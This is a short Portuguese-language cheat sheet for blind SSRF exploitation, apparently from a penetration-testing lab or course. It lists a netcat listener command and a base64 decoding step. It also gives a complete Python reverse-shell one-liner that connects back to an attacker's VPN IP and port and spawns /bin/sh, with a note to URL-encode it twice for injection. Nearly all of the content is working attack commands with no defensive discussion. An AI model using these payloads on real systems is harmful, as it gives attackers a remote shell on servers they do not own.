# Blind SSRF Exploitation Example

| `nc -lvnp 9090`                                  | Iniciando um ouvinte netcat                   |
| ------------------------------------------------ | --------------------------------------------- |
| `echo """<B64 encoded response>""" \| base64 -d` | Decodificando a resposta codificada em base64 |

Carga útil do shell reverso (para ser URL codificado duas vezes)

```
export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```